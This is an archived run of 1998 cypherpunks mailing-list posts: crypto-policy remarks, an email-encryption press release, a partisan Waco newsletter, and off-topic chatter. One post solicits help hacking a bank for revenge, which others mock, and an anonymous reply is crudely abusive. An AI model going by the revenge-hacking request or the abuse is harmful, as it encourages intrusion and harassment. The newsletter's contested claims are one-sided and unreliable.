T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT4gVGhl
IHRlcm0gInVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5j
b20iCm11c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0aW9uIG9mIHRoZSBl
bWFpbC48L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7Cgo8UD48Rk9OVCBG
QUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxlYXNlIE5v
dGU6IFNvbWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3MgbmV3cyBhcmUgdGlt
ZSBzZW5zaXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1heSBub3QgYmUKYXZh
aWxhYmxlIGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRoZSBkYXkuJm5i
c3A7IEFsc28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBiZSBzdWJzY3JpcHRp
b24tYmFzZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24uPC9GT05UPjwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
Pgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KPC9U
QUJMRT4KJm5ic3A7PC9jZW50ZXI+CjwvQk9EWT4KPC9IVE1MPgo=
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 18 Aug 1998 11:08:45 -0700 (PDT)
To: "Bill Stewart" <bill.stewart@pobox.com>
Subject: Re: Private Doorbell - Re: CRYPTO-GRAM, August 15, 1998
Message-ID: <199808181810.OAA22170@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Aug 1998 09:29:12 -0700, Bill Stewart wrote:

>so Louis Freeh should be happy enough
>(since it meets the "legitimate needs of law enforcement",

Not to bug you personnally, just a comment on the general state of affairs:

IMHO, there is no such thing as "legitimate needs of law enforcement" that
could justify such a limitation of the freedom of the individuals who had
done
nothing wrong.

"legitimate" in our present context means to "counter things that are
presently illegal", notwithstanding that an immense portion of the
population,
which in essence does not try to get a free ride from some sort of law, do
not
agree at all with the said law.

Somehow, I think that it is time to emphasize our taking of the moral high
ground.

Ciao

jfa


Definition:  FACISM: n.:  a political and economic movement, strongly
nationalistic, magnifying the rights of the state as opposed to those of the
individual, in which industry, though remaining largely under private
ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose,
without resistance, is by disarming the people and making it an offense to
keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic
government that preceded Hitler, and were a strong aid to his coming to 
power -- because they disarmed Hitler's opponents, and Hitler's adherents
ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and
genocides.  Once the disarming is complete, the public is helpless against
those who have the guns.
-------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C




Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ltisue@aol.com
Date: Tue, 18 Aug 1998 12:28:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: email travel information
Message-ID: <d40ec01.35d9d5a3@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I am interested in travel between Knoxville, Tennessee  and Des Moines, Iowa.
I would also be interested in Nashville, Tennessee and Des Moines, Iowa or
Atlanta and Des Moines, Iowa.  Please notify me of specials in these markets.

Thanks,
Linda Tisue

ltisue@aol.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jack Oswald / CEO / RPK Security" <joswald@rpkusa.com>
Date: Tue, 18 Aug 1998 18:14:15 -0700 (PDT)
Subject: Announcement: INVISIMAIL INTERNATIONAL LTD. ANNOUNCES  RPK InvisiMail ENTERPRISE EDITION
Message-ID: <199808190109.SAA21319@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time in the past your name was submitted to our e-mail mailing list database.  If you do not wish (or no longer wish) to receive announcements, updates and news concerning the RPK Encryptonite Engine or the RPK InvisiMail e-mail security products, please forward this message to remove@rpkusa.com

----------------------------------------------------------------------------------------------------------

FOR IMMEDIATE RELEASE

CONTACT
Paula Miller							Lyn Oswald
Nadel Phelan, Inc.						RPK Security, Inc.
408-439-5570 x277						212-488-9891
paulam@nadelphelan.com					lynoswald@rpkusa.com


INVISIMAIL INTERNATIONAL LTD. ANNOUNCES  RPK InvisiMail(tm) ENTERPRISE EDITION

RPK InvisiMail Adds Strong and Fast Public Key Encryption Security to 
Internet E-Mail Products

SAN FRANCISCO, CA. August 18, 1998 - InvisiMail International, Ltd. (www.InvisiMail.com), announced today the release of RPK InvisiMail Enterprise Edition, a globally strong corporate e-mail security add-in.  RPK InvisiMail Enterprise Edition's flexible design allows corporate IT managers to configure e-mail security for individual users, networks and gateways.  RPK InvisiMail automatically and transparently encrypts e-mail messages and attachments, authenticates the sender and verifies that the contents have not been changed in transit. 

RPK InvisiMail integrates seamlessly with any Internet e-mail protocol-compliant product (SMTP, POP3, and IMAP4), to provide transparent, behind-the-scenes security that is easy to install and simple to use.  Unlike other e-mail security systems, InvisiMail operates through a local proxy service allowing it to be configured for a variety of environments.  Developed outside the U.S., RPK InvisiMail is the first e-mail security product with strong encryption, available worldwide and not subject to U.S. export restrictions.  RPK InvisiMail has been tested and certified by the International Computer Security Association (www.icsa.net).

more

InvisiMail Announces RPK InvisiMail Enterprise Edition		page 2 of 4

 "Several of our clients have asked us to encrypt their e-mail communications.  We have not used encryption up to now because of the difficulty in finding a program that worked with all e-mail software packages and was highly secure.  We recently installed and tested InvisiMail's Enterprise Edition which is very effective and easy to install.  Most of the e-mail encryption packages we evaluated originated in the U.S. and because of export restrictions were barely secure.  We now recommend that clients who wish to work with us using encrypted e-mail obtain a copy of InvisiMail," said Martin Fenn, International Law Systems Journal.

"As a leading nationwide ISP with a fast growing market of home users and business customers, we are always looking at innovative tools to include in our Internet software suite to help the user. Security is a hot topic at the moment and we felt that InvisiMail provided a level of security that was second to none in addition to being appropriate for home and business users alike," said Victoria Rosethorn, Marketing Director, Prestel Online PLC.

RPK InvisiMail automatically integrates with client software including Netscape (Navigator or Communicator), Microsoft Internet Explorer (Internet Mail or Outlook Express), Microsoft Exchange or Outlook, Eudora (Light or Pro), Pegasus, Calypso, TurnPike, Parsons E-mail 2000 and Symantec ACT! 4.0.  InvisiMail also integrates with server software including Microsoft Exchange Server, Lotus Notes, Novell GroupWise, cc:mail and any other e-mail server with an SMTP compliant gateway.

more

InvisiMail Announces RPK InvisiMail Enterprise Edition		page 3 of 4



Key Features of RPK InvisiMail Enterprise Edition:

Globally strong encryption
Transparent to the user 
Automatic encryption 
Automatic verification of message sender and contents
Automatic key management
Seamless integration/Multi-platform support
Open-Standards design
Flexible configuration and management
Universally flexible "Proxy Architecture"
Centralized policy setup and management
Ease of installation



PRICING AND AVAILABILITY
Pricing for RPK InvisiMail Enterprise Edition is based on the number of seat licenses, and ranges from $100 to $59 per seat based on quantity.  Other RPK InvisiMail encryption products are InvisiMail Intro, which is available (FREE) as a download from www.invisimail.com, and InvisiMail Deluxe (US $29.95 per user).


more

InvisiMail Announces RPK InvisiMail Enterprise Edition		page 4 of 4

ABOUT InvisiMail INTERNATIONAL LTD.
InvisiMail International Ltd., founded in 1997, specializes in secure Internet commerce and communications solutions for a wide range of applications.  An adherence to open communication standards, using a distinctive Proxy Architecture, makes the InvisiMail International approach to security the most flexible available.  Developed using RPK Security, Inc.'s core technology, the RPK Encryptonite Engine(tm), the InvisiMail range of products supports secure message-based applications including Client Services ECommerce, EDI and others that require absolute confidentiality and the highest security levels.  This allows the simplest e-mail systems to become the most powerful business and commerce tools.  Contact InvisiMail at www.InvisiMail.com or call +44 1624 611 003.


ABOUT RPK SECURITY, INC.
Founded in 1995, RPK Security, Inc. is a technology leader in fast public key cryptography.  Its flagship RPK Encryptonite(tm) Engine, a strong and uniquely fast public key encryption technology, is available worldwide in custom hardware and software toolkits on multiple platforms.  RPK solutions are ideal for electronic communications, financial transactions, Internet banking, smart cards, streaming audio-video, telecommunications and more. Developed from widely accepted security mathematics and techniques, the RPK Encryptonite Engine is easily embedded into new and existing hardware and software applications.  RPK's cryptographic research and product development is based in New Zealand and Switzerland, with worldwide sales and marketing operations in San Francisco, CA.  Contact RPK at www.rpkusa.com or call (212) 488-9891.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FTPPork@aol.com
Date: Tue, 18 Aug 1998 15:30:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <10c24406.35d9ffd1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


It's people like Lt that give AOL a bad name... I am sorry to say I am a part
of it, but I just keep it because I don't feel like switching... ah well.

At least they have TCP/IP protocols now with Win 95
ex: Hiroshima 45, Tsjernobyl 86, Windows 95 

(Please, correct my spelling if I misspelled Tsjernobyl)

Anyway, Lt... get real, this is Cypherpunks, not travel.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <root@ssds.com>
Date: Tue, 18 Aug 1998 18:20:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199808190006.CAA25721@mail.tol.it>
Message-ID: <Pine.LNX.3.96.980818192206.1100B-100000@mothra.fastrans.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Aug 1998, paolo wrote:

> Sorry I'm not very expert about invading systems but I need your help to
> enter in a bank.I have all the informations and I need to know if it is
> possible to enter. 
> They were not very correct with me and now they must pay for it.What do you
> think about that?
> Can you help me to find any good italian hackers?
> ZORRO
> 

I usually ignore these type of messages, but this one gets my vote
for the most clueless post of all time. ;-)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 18 Aug 1998 18:16:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199808190006.CAA25721@mail.tol.it>
Message-ID: <Pine.SUN.3.91.980818200546.23903A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Aug 1998, paolo wrote:

> Sorry I'm not very expert about invading systems but I need your help to
> enter in a bank.

	[...]

> Can you help me to find any good italian hackers?

	Now that you've declared your intent to the whole world, 
	I'd recommend instead that you find a good Italian hacksaw.	

	I have a lovely focaccia recipe, if you need something
	to bake it into.

							-Caj

	Not to piss off those world-famous Italian hackers or anything.
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@jpunix.com>
Date: Tue, 18 Aug 1998 19:07:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199808190006.CAA25721@mail.tol.it>
Message-ID: <19980818210749.A29422@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, Aug 19, 1998 at 02:07:12AM +0200, paolo wrote:
> 
> Sorry I'm not very expert about invading systems but I need your help to
> enter in a bank.I have all the informations and I need to know if it is
> possible to enter. 
> They were not very correct with me and now they must pay for it.What do you
> think about that?
> Can you help me to find any good italian hackers?
> ZORRO

Sure thing! Just send us your full name, address (mailing and physical),
and phone number. I'm sure you will get plenty of help.

-- 
 John Perry perry@jpunix.com PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 http://rc5stats.distributed.net/tmsummary.idc?TM=4264 for freechess.org RC5.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 18 Aug 1998 14:21:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808182122.XAA03175@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a special.  If you line up behind my foot, I'll boot you in the ass
all the way to any of the places mentioned.  Free of charge.  Does
that sound like a good special?  The best things in life are free, like
a foot shoved in your ass.  Wouldn't you agree?


At 03:27 PM 8/18/98 -0400, Ltisue@aol.com wrote:
>I am interested in travel between Knoxville, Tennessee  and Des Moines, Iowa.
>I would also be interested in Nashville, Tennessee and Des Moines, Iowa or
>Atlanta and Des Moines, Iowa.  Please notify me of specials in these markets.
>
>Thanks,
>Linda Tisue
>
>ltisue@aol.com
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Moore <CarolMoore@kreative.net>
Date: Tue, 18 Aug 1998 20:55:38 -0700 (PDT)
To: A-Libertarian List <carolmoore@kreative.net>
Subject: Waco Update: 8-18-98
Message-ID: <35DA4B94.8B9C716F@kreative.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Libertarians!  From time to time I send you my latest
Waco update.  If you want me to put you on
my list of 1 or 2 Waco updates a month (if
that, now a days) feel free to email me.  Also, some
other interesting developments will be coming up in next
couple months and will e-mail you at that time about
another lists you may find of interest.  Carol in D.C.
-----------------------------------------------------
WACO UPDATE--August 18, 1998
By Carol Moore, author, The Davidian Massacre
Member, Committee for Waco Justice

          Because of weeks of computer problems-finally solved!--this
update is a month overdue.  It's also full of news!

DAVIDIANS CONFRONT BATF AGENT AT SEMINAR
          On June 26, 1998 several Davidian survivors participated in a
Waco-related seminar in Austin, Texas sponsored by Texas Best
Seminars.  They included Clive Doyle, Sheila Martin, and Catherine
Matteson.
          Appearing with them was BATF Agent Dale Littleton.
Littleton allegedly is the agent who knocked over a Waco television
cameraman taking video after the failed February 28, 1993 raid.
Also, Karen Kilpatrick, who with her partner Henry McMahon sold
guns to Koresh, alleges it was Littleton who physically assaulted her
when BATF had them under detention during the 1993 siege. (She
and McMahon considered a law suit but did not meet the two year
deadline.)
          According to a Davidian who participated in the event,
Littleton faced a very angry crowd but skillfully avoided providing
any real information in his answers to questions.
For more information, go to http://downsize.ml.org and listen to
"realplayer" audio of the proceedings.

BATF AGENT WINS CONSPIRACY SUIT
          According to the Waco Tribune-Herald (from which I've
freely quoted here) BATF agent Robert Rodriguez won a $1.3
million verdict in his civil suit case against psychologist Roger M.
Solomon in a federal trial in late July in Waco.  (Judge Walter J.
Smith, who sentenced 9 Davidians to 243 years presided.)
Rodriguez, 47, a 15 year BATF veteran, was the undercover agent
who infiltrated the Branch Davidian church and alerted BATF
supervisors that the Davidians had learned BATF agents were about
to raid them on February 28, 1993.  Despite this warning,
supervisors went ahead with the raid-later claiming it was
Rodriguez' fault the Davidians "ambushed" them.  (Of course, there
is ample evidence nervous and aggressive agents shot first.)
          Rodriguez originally sued Solomon, nine BATF officials, the
BATF and the U.S. government. However, a federal appeals court
dismissed all but three BATF officials and Solomon from the suit.
The three officials, Phillip Chojnacki, James Cavanaugh and the
former BATF director Stephen E. Higgins settled with Rodriguez
for undisclosed amounts.  The jury ruled Solomon was responsible
for 25% of the $1.3 million.
          At trial, Rodriguez stated that the conspiracy by BATF
commanders ruined his reputation, left him depressed and suicidal
and caused even his own children to question his actions. He alleges
in his lawsuit that psychologist Solomon violated his oath of doctor-
patient confidentiality and told one of Rodriguez' superiors that
Rodriguez had changed his version of what happened. Solomon
denied he had breached confidentiality or that he was part of the
conspiracy with BATF officials to indirectly blame Rodriguez for the
deaths of four agents.  However, Rodriguez testified that he was
told by former BATF assistant director Ron Noble that Solomon had
violated his confidentiality.
          "My problems came from the cover-up, because that took
away all my pride," Rodriguez told the jury.  His new psychologist
told the jury that Rodriguez suffers from post-traumatic stress
disorder, major depression, mood swings, what he termed "survivor
guilt," insomnia, nightmares , suicidal tendencies and flashbacks
about the February 28, 1993 raid and April 19, 1993 fire.
          After the verdict Rodriguez said: "For me, personally, yes,
this trial was important for me to feel vindicated. I needed this public

forum."  Unfortunately, the Davidian victims have not yet received
the same fair forum to air their complaints about the BATF/FBI
conspiracy that led to the deaths of 82 men, women and children.

DAVIDIAN MEMORIAL AND MUSEUM AT MOUNT
CARMEL
          July and August's weeks of higher than average temperatures
have taken their toll on the 82 cypress myrtle trees planted at Mount
Carmel for the 82 victims.  Davidian survivors report it takes about a
half an hour a week to water and tend to each tree.  The few
survivors, with help from some friends, are keeping on top of the
job, as well as keeping their small museum open for the dozens of
visitors who still stop by every week.  So if you are in the area, feel
free to drop by. Because it is staffed by volunteers, the museum
itself may not be open.  To check on its hours a day or two in
advance call the museum office at 254-863-5985.
          Warning: Long-time squatter Amo Roden, sometimes with an
ally, will try to hit you up for an entry fee at the front gate.  Try to

ignore them.  There is no fee for visiting Mount Carmel or the
museum.  Hopefully, the local judge will finally give Mount Carmel
survivors clear title to the property during the long-delayed
September, 1998 trial.
          Directions to Mount Carmel: 1785 Double EE Ranch Road
east if Waco.  Take I-35 into Waco, Texas. Get Off at North Loop
340 (also known as: Lake Shore Dr.) Head East until you get to
Farm Rd 2491. Turn Left onto Farm Road 2491. Go 8 to 9 miles
until you get to the "Y" in the road. Veer Left at the "Y" and
continue about 1/2 mile to two blue water tanks. Turn Left onto EE
Ranch Road.
          If you can't make it, check out the survivors' catalog at:
http://www.kreative.net/carolmoore/waco-catalog.html  To
contribute, send checks to: Mount Carmel Survivors Memorial
Fund, Inc., Box 120, Axtel, TX 76624.

JUDGE DEMANDS BATF ACCOUNT FOR WACO VIDEO
TAPES
          On May 29, 1998 attorney David Hardy, who is helping with
Freedom of Information Act suits for Branch Davidian civil suits
against federal agents and officials, sent out the following news:
           "ATF had contended that it'd searched all likely repositories

of Waco info, and could find no still photos and but one video. It'd
conceded that there were 4-5 government videocams aimed at front
door, but contended none of their output could be found by
reasonable search, of the likely repositories (chiefly the evidence
locker of the Waco satellite office).  District court found that was
sufficient under FOIA and dismissed the claim against ATF (claim
against FBI is still outstanding).
          "I filed a motion to reconsider (VERY rarely granted)
accompanied by an affidavit from David Hall, which Mike McNulty
got for me. Affidavit said an ATF agent had told him there *were*
still photos, had shown him some, and that it was common
knowledge that the main repository for Waco evidence was not the
Waco office but the Murrah building in Oklahoma City; after the
bombing the files were recovered and moved. Government
responded that they'd done an adequate search and the affidavit
showed nothing new--it merely said it was "common knowledge,"
etc.
          "Court ruled May 26 (got copy today) granting the motion to
reconsider, and ordering gov't to provide within 30 days affidavits
from the agent as to the photos, whether they were stored at the
Murrah building, their relocation and any current known
whereabouts, plus affidavits to show either that they were not stored
there or have been located and searched."
          Keep fighting for that information, David!

CAUSE FOUNDATION AND CONFEDERATE FLAG
          Cause Foundation, which offered its services to Davidians
during the siege and originated the first Davidian survivor and family
civil suits against the government, has suspended fundraising and its
newsletter.  However, attorney Kirk Lyons is still working on the
case.  In a last letter to supporters, Lyons blamed the moves on
decreased support for the Waco case, as well as "demonization" of
Cause efforts by Oklahoma conspiracy theorists and others who
have questioned Lyons' friendship with Andrew Strassmeier, who
some charge was involved with the bombing. However, funds to
support the Waco case, including to help preserve vital evidence,
still can be sent to: Cause Foundation, 1112 1/2 Montreat Road, Suite
1, P.O. Box 1235, Black Mountain, NC 28711.
          Enclosed with that mailing was a flyer about the organization
Kirk Lyons now works for, the Southern Legal Resource Center,
which bills itself as the "ACLU for the Confederate flag." I received
the letter just a few days before running into an African-American
libertarian wearing a shirt from the "NuSouth" company.  The shirt
sported a small Confederate flag logo in "African" colors of red,
black and green.  In an article on its web page, NuSouth's young
black owners state: "The logo, once you get it, is a simple message
of hard work, self-improvement and independence, a complete
rejection of the lingering rhetoric of victimization."  See
http://www2.nusouth.com/nusouth/gq.html
          I e-mailed Lyons, asking how he felt about this permutation of

the confederate flag and the implicit "we'll support your secession if
you support ours" feel.  Lyons replied:  "Making many little
countries out of big countries - I can't be against it. Liberty is
always
lost within Empires, and tends to flourish in smaller states."  It
would be nice to see a "win-win" solution on that one issue, anyway!

SECRET SERVICE WACO COVER-UP ARTIST EXPOSED
          On June 6, 1998, Joseph Farah, editor of the Internet
newspaper WorldNetDaily.com  published an article entitled: "Don't
Trust Secret Service Director"  Below are some quotes evidencing
that at least some of the press is aware of the all-pervasiveness of the

Waco massacre cover-up:
           Secret Service Director Lewis Merletti is letting it be known

that he will "fight to the death" to prevent Independent Counsel
Kenneth Starr from pursuing testimony about Oval Office secrets by
his agents.
          Merletti claims that forcing Secret Service agents to testify
whether they saw President Clinton in compromising positions with
women would be tantamount to "handcuffing" his ability to keep the
president safe. He goes so far as to suggest that if he cooperates
with Starr, "the inevitable result will be the death of another
president."
          At first blush, you might chalk up such rhetoric to an
administrator standing up for his employees. But there's much more
at work here. You see, Secret Service Director Lewis Merletti is one
of this administration's many professional cover-up artists.
          Why do I say that? Well, because he's a veteran of one of the
first major cover-ups of the Clinton administration. He was
promoted to director of the Secret Service after serving as assistant
project director of the Waco Administrative Review Team created
by Clinton's Department of the Treasury....
          That's where Merletti comes in. Then a Secret Service agent,
he was assigned a key role in the first investigation of Waco. He
claimed in congressional testimony that every single BATF agent he
interviewed understood that the raid would be aborted if met with
resistance. He was contradicted not just by officials on the scene but
by his superior in the investigation as well...
          Merletti owes his career to Bill Clinton. He got his job by
carrying water for the administration in its first major scandal. Is it
any wonder he's taking a stonewall-the-investigation position now?
(End quotes)

RENO OPPOSES CITIZENS PROTECTION ACT OF 1998
          In June U.S. Reps. Joseph McDade, R-Pa., and John Murtha,
D-Pa., introduced a bill, the Citizens Protection Act of 1998 (H.R.
3396), to protect U.S. citizens from frame-ups by the U.S.
Department of Justice. (Both men are survivors of attempted Justice
Department frame-ups.)  The bill had 169 sponsors as of mid-July.
          Rep. McDade notes that "there are Justice Department
employees who engage in questionable conduct without penalty and
without  oversight, using the full weight and power of the U.S.
government."  As we all know, the Justice Department did just that
to the Davidian prisoners, seven of whom are now serving a total of
235 years.  Memos disclosed during the House Waco hearings
showed they squashed Treasury Department interviews with BATF
agents who attacked Mt. Carmel February 28, 1993.
Officials-including the Associate Attorney General Webster
Hubbell-knew such interviews might provide "exculpatory material"
that could prove the Davidians were innocent, i.e., prove they were
victims of such a vicious attack that self-defense was legally
warranted.
          The bill would require U.S. attorneys to comply with state
laws and create a misconduct review board with the power to obtain
and make public information concerning investigations, classified
material and other confidential information.  At her weekly press
briefing in late June Attorney General Janet Reno told the press: "I
think the sponsors of this ill are trying to solve a problem that really

doesn't exist."
          For the text of the bill and information about its status and
sponsors, search the Thomas locator at: http://thomas.loc.gov/ And
feel free to write your congresscritter and tell him/her to support
H.R. 3396.

PROSECUTOR TO APPEAL RUBY RIDGE DISMISSAL
          In late May, 1998 Boundary County, Idaho, prosecutor
Denise Woodbury announced she was appealing the dismissal of an
involuntary manslaughter charge against FBI sharpshooter Lon
Horiuchi who killed Vicki Weaver during the 1992 Ruby Ridge
siege.  U.S. District Judge Edward Lodge dismissed Utah state
charges against Horiuchi on May 14.  Lodge accepted the Justice
Department argument that Horiuchi was acting in the line of duty
when he fired and was protected by the Supremacy Clause of the
U.S. Constitution.
          However, if states cannot prosecute federal agents who
kill-and there currently is no federal law allowing prosecution of
murderous agents-it is evident we are living in a defacto police state.
(There are laws against federal agents depriving a person of civil
rights under specific circumstances but they are regarded as
relatively minor offenses.)
          Some have suggested that the charges should have been
brought against the persons who issued the "shoot on sight" order
(Hostage Rescue Team Commander Richard Rogers under
advisement from former FBI Deputy Director Larry Potts.)  The
reasoning is that while the sniper can claim that he followed the
orders--legal or not--the person issuing the order has no such
defense. And, under the law of most states, any person who aids,
advises or counsels commission of a crime--let alone orders it--is
guilty of the crime as if he'd committed it himself.  In fact, they
might even be prosecuted for murder. However, it is unlikely that
the Utah prosecutor will take this approach.

LIBERTARIAN PARTY CALLS FOR IMPEACHMENT OF
CLINTON
          As a member of the Libertarian Party, I attended its national
convention in early July.  A number of libertarians already were in
agreement that the party should call for impeachment of  President
Bill Clinton.
          On Sunday, July 5th, I got a chance to address the convention
as a protest candidate for party office. (I lost on the second ballot
but made my point against a candidate who favors watering down
the Libertarian Party platform.)  In my speech I urged delegates to
vote for Clinton's impeachment because of his obstruction of justice
in the investigation of the BATF and FBI's crimes against the Branch
Davidians.  A short time later the Minnesota delegation made the
following proposal from the floor, which was adopted by the
convention as a whole:
          "Resolution of the 1998 LP National Convention
          "Be it resolved: The Libertarian Party urges the U.S. House
of Representatives    to begin Articles of Impeachment against
President Clinton and Vice President Gore for violation of their oath
of office, specifically their failure to uphold and defend the United
States Constitution."
          The party later sent out a press release announcing the
party's
new position on the Impeachment of President Clinton, garnering a
great deal of press interest.  Time will tell if the fawning press and
nation fall for Clinton's phony August 17th apology.  A number of
women have provided credible evidence that Clinton is a sexual
predator.  It would be fitting if that is what brings him down,
considering that he used allegations that David Koresh had
committed sexual crimes to excuse the BATF/FBI murders of 82
men, women and children.  (Check my web page  around August
25st for photos from the convention.)

UPDATES TO THE DAVIDIAN MASSACRE HOME PAGE
          The page includes the full text of Carol Moore's book,
extensive updates, articles and documents, and dozens of
photographs that demonstrate the government's crimes and citizens'
protests.
http://www.kreative.net/carolmoore/davidian-massacre.html
          Check out my *new* photographs and photograph pages,
including:
          Index of Waco photo pages of BATF/FBI crimes and citizen
protests:
http://www.kreative.net/carolmoore/waco-photos.html
          Photos of fifth memorial for Davidian victims at Mount
Carmel, outside Waco:
http://www.kreative.net/carolmoore/4-19-98.html
          New photos of Committee for Waco Justice protests have
been added to this page:
http://www.kreative.net/carolmoore/cwj-photos.html
          Photographs of the leading BATF and FBI agents and
officials responsible for the murder of the Branch Davidians:
http://www.kreative.net/carolmoore/waco-perps.html
          Photographs of Washington D.C. demonstrations for
Impeachment of Clinton:
http://www.kreative.net/carolmoore/impeach-demo-photos.html
          March 27, 1998 Jericho '98 Protest Photos-a rally for
political prisoners:
http://www.kreative.net/carolmoore/3-27-98-protest.html
          The Davidian prisoners' page includes their addresses, in case

you would like to write and offer them encouragement:
http://www.kreative.net/carolmoore/waco-prisoners.html
          Finally, my main "Consciousness and Community" web page
finally has been completed and all links now lead you to topics of
relevance to "students of consciousness" and to those interested in
liberty, community, decentralization, secession, constitutional
alternatives, non-violent action theory and practice, Year 2000
organizing, etc.  http://www.kreative.net/carolmoore

CarolMoore@kreative.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lars Weitze" <chromedemon@netcologne.de>
Date: Tue, 18 Aug 1998 15:22:36 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: European freedoms...
Message-ID: <003801bdcafe$d46dc6f0$7b0000c8@chrome>
MIME-Version: 1.0
Content-Type: text/plain


Yae that's right! But esp. Germany is tending to the same way to "secure"
the citys like in New York.

--
"One dead is a tragedy, thousand deads are a statistic."
        Karl Marx

e-mail: chromedemon@netcologne.de
http://chromedemon.home.pages.de
http://www.netcologne.de/~nc-weitzela2
-----Original Message-----
From: Secret Squirrel <anon@squirrel.owl.de>
To: cypherpunks@toad.com <cypherpunks@toad.com>
Date: Montag, 17. August 1998 23:32
Subject: Re: European freedoms...


>>With the exception of some lifestyle options Europeans probably have
>>less freedoms than Americans.
>
>How come that the fraction of Americans in prison is ten times higher
>than the fraction of West Europeans?
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?iso-8859-1?Q?J=F8rgen?= Spangen <jorgen.spangen@ha-nett.no>
Date: Tue, 18 Aug 1998 15:36:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.5.32.19980819003641.00994950@mail.ha-nett.no>
MIME-Version: 1.0
Content-Type: text/plain



school suckes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?iso-8859-1?Q?J=F8rgen?= Spangen <jorgen.spangen@ha-nett.no>
Date: Tue, 18 Aug 1998 15:49:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.5.32.19980819004932.009d8cd0@mail.ha-nett.no>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paolo <fansword@tin.it>
Date: Tue, 18 Aug 1998 17:07:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199808190006.CAA25721@mail.tol.it>
MIME-Version: 1.0
Content-Type: text/plain


Sorry I'm not very expert about invading systems but I need your help to
enter in a bank.I have all the informations and I need to know if it is
possible to enter. 
They were not very correct with me and now they must pay for it.What do you
think about that?
Can you help me to find any good italian hackers?
ZORRO




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 19 Aug 1998 02:34:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: your mail
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8372@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


Tim Griffiths wrote:

> Jim Burnes wrote:
>> I usually ignore these type of messages, but this one gets my vote
>> for the most clueless post of all time. ;-)
>and then Bernardo replied to John Perry's troll, err, offer of help...
>>>Sure thing! Just send us your full name, address (mailing and
physical),
>>>and phone number. I'm sure you will get plenty of help.
>>Here is my address  
